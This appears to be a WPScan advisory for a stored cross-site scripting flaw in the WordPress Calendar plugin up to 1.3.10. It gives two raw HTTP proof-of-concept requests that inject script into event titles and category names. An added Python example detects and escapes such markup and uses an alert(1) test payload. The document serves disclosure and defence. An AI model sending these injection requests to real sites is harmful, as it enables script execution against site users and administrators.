Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)

Description
This WordPress plugin allows remote authenticated users who lack the unfiltered_html capability to execute JavaScript code through a stored XSS attack. By default the plugin is available to users with the Contributor role or higher.
Proof of Concept
POC 1

You can inject JavaScript code into the event title when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB


POC 2
You can inject JavaScript code into the category name when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS]&category_colour=&save=Save+%C2%BB
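
Both PoCs store attacker-controlled text (event_title in POC 1, category_name in POC 2) that the plugin later echoes into admin and front-end pages without escaping. The following is an added example, not code from the Calendar plugin or from WPScan, written in Python rather than the plugin's PHP so it runs stand-alone. It models the two controls a defender wants here: a request-side check that flags HTML tags in those two fields (usable in a WAF rule or when reviewing access logs), and the input-filtering and output-escaping that close the bug, keyed on the unfiltered_html capability the advisory names. The field names come from the PoC bodies; the sample bodies and the capability sets are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Form fields the advisory identifies as stored and rendered unescaped.
WATCHED_FIELDS = {"event_title", "category_name"}

# Crude tag-opener detector: "<" followed by an optional "/" and a letter or "!".
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")


def flag_html_in_fields(body: str, fields=WATCHED_FIELDS) -> dict:
    """Decode a urlencoded POST body and return {field: decoded_value} for every
    watched field whose value contains an HTML tag opener. Used for detection
    (WAF rule / log review), not as a substitute for escaping on output."""
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in fields:
        for value in params.get(name, []):
            if TAG_RE.search(value):
                hits[name] = value
    return hits


def sanitize_title_for_storage(value: str, user_caps: set) -> str:
    """Input-side filtering keyed on the capability named in the advisory.
    Users without unfiltered_html get tags stripped (the same intent as
    WordPress sanitize_text_field); users holding it keep their markup,
    which WordPress core itself permits. Constructed model, not plugin code."""
    if "unfiltered_html" in user_caps:
        return value
    return re.sub(r"<[^>]*>", "", value)


def escape_for_html(value: str) -> str:
    """Output-side encoding applied at render time, whatever was stored.
    Same intent as WordPress esc_html(); this is the control that actually
    fixes a stored XSS, with storage-side filtering as defense in depth."""
    return html.escape(value, quote=True)


# Constructed sample bodies modelled on the two PoC requests; [XSS] is replaced
# by the standard <script>alert(1)</script> marker, urlencoded as a browser would.
SAMPLE_EVENT_BODY = (
    "action=add&event_id=&event_title=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    "&event_desc=test&event_category=1"
)
SAMPLE_CATEGORY_BODY = (
    "mode=add&category_id=&category_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    "&category_colour="
)
BENIGN_EVENT_BODY = "action=add&event_id=&event_title=Team+meeting&event_desc=test"

if __name__ == "__main__":
    for body in (SAMPLE_EVENT_BODY, SAMPLE_CATEGORY_BODY, BENIGN_EVENT_BODY):
        print("flagged:", flag_html_in_fields(body))
    raw = "<script>alert(1)</script>Meeting"
    print("stored (contributor):", sanitize_title_for_storage(raw, {"edit_posts"}))
    print("rendered:", escape_for_html(raw))
```

The detector only tells you that a watched field carried markup; whether that is a problem depends on who sent it, so pair it with the requesting user's role in the log. The fix itself is the escape_for_html step at render time: once every echo of event_title and category_name goes through output encoding, a stored `<script>` tag is displayed as text rather than executed, regardless of what the storage-side filter let through.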

Affects Plugin

Calendar (fixed in version 1.3.11)

References

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher boombyte
Submitter boombyte
Verified No
WPVDB ID 9141

Timeline

Publicly Published 2018-10-30
Added 2018-11-02
Last Updated 2018-11-17

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.